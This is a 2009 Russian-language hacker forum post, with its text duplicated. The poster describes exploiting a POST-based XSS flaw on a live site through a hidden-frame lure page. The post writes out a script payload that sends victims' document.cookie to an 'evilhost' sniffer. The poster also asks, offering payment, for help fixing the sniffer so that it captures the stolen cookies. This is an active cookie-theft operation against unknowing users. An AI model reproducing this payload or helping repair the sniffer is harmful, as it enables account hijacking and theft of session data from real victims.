G4bR1eL
17.11.2009, 16:04
Приветствую всех пользователй форума Antichat. Тему создал из-за проблемы, возможно если она решится это поможет многим другим людям которые пытались использовать уязвимость этим методом, но у них были какие-либо проблемы.
Недавно я нашел xss уязвимость на неком сайте site.com. Осуществить эту уязвимость можно было методом POST, так как работало целевое поле
<form method="POST">
Тут код
</form>. Тобишь проводился инклуд кода, который нефильтровался и уязвимость на ура помогала вытаскивать кукисы (ну и до сих пор помогает разумеется). Мною был создан сайт на бесплатном хостинге, где была размещена страница-удочка, с framom, который незаметно для жертвы открывает нашу страницу site.com/index.php, вводит скрипт в нашу форму "POST" и подтверждает её. Значит клиентская часть выполняется успешно. В результате невидимо от пользователя frame выводит его (без его ведома) на http://evilhost.ru/s.php?login=Lolo
В фрейме выполняется код по нашей форме "POST" и его перекидывает по нашей ссылке собственно
'">
<script>document.location.href="http://evilhost/s.php?"+document.cookie;</script>'>
+document.cookie в данном случае = $QUERY_STRING
Кого заинтерисует данная тема и кто работал с xss методом post, я бы хотел что бы этот человек посмотрел мой сниффер и frame и сказал в чем ошибка, буду очень благодарен, возможно даже денег дам.
P.s. Использовал сниффер от куника + свой, просто не хочет видеть QUERY. Тобишь на мыло мне приходит подтверждение что XSS сработала, но без данных. А в логи сниффера также записываются IP и данные браузера, но опять же без QUERY.
Недавно я нашел xss уязвимость на неком сайте site.com. Осуществить эту уязвимость можно было методом POST, так как работало целевое поле
<form method="POST">
Тут код
</form>. Тобишь проводился инклуд кода, который нефильтровался и уязвимость на ура помогала вытаскивать кукисы (ну и до сих пор помогает разумеется). Мною был создан сайт на бесплатном хостинге, где была размещена страница-удочка, с framom, который незаметно для жертвы открывает нашу страницу site.com/index.php, вводит скрипт в нашу форму "POST" и подтверждает её. Значит клиентская часть выполняется успешно. В результате невидимо от пользователя frame выводит его (без его ведома) на http://evilhost.ru/s.php?login=Lolo
В фрейме выполняется код по нашей форме "POST" и его перекидывает по нашей ссылке собственно
'">
<script>document.location.href="http://evilhost/s.php?"+document.cookie;</script>'>
+document.cookie в данном случае = $QUERY_STRING
Кого заинтерисует данная тема и кто работал с xss методом post, я бы хотел что бы этот человек посмотрел мой сниффер и frame и сказал в чем ошибка, буду очень благодарен, возможно даже денег дам.
P.s. Использовал сниффер от куника + свой, просто не хочет видеть QUERY. Тобишь на мыло мне приходит подтверждение что XSS сработала, но без данных. А в логи сниффера также записываются IP и данные браузера, но опять же без QUERY.